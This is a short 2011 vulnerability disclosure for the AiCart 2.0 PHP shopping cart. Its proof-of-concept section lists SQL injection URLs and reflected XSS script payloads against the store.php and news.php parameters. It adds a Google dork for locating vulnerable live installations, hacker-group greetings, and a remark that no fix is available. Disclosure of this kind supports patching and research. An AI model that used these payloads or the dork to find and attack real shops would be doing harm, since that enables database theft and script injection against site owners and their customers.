AiCart 2.0 Multiple Vulnerabilities

2011-06-18 10:15:09

=================================[ AiCart 2.0 Multiple Vulnerabilities ]===================================

== Infos ==================================================================================================

[ Date ] [ 18.06.2011 ]
[ Software URL ] [ http://www.aicart.ca/ ]
[ Version ] [ 2.0 ]
[ Google Dork ] [ inurl:'/store.php?action=view_product pid=' ]
[ System ] [ PHP ]
[ Testing System ] [ Fedora ]
[ Risk Level ] [ High ]
[ CVE ] [ - ]

== Autor Details ==========================================================================================

[ Autor ] [ takeshix ]
[ Autor Contact ] [ [email protected] ]

== PoC ====================================================================================================

[ SQLi ] http://localhost/store.php?action=view_product?pid='
[ SQLi ] http://localhost/store.php?rid='
[ SQLi ] http://localhost/news.php?nid='&action=view

[ XSS ] http://localhost/store.php?action=view_product?pid=<script>alert('takeshix')</script>
[ XSS ] http://localhost/store.php?rid=<script>alert('takeshix')</script>
[ Xss ] http://localhost/news.php?nid=<script>alert('takeshix')</script>&action=view

== Greez ==================================================================================================

[ hackademics ] [ DSU ] [ UNITS ]

=============================================[ hacktivistas ]==============================================

Fixes

No fixes

In order to submit a new fix you need to be registered.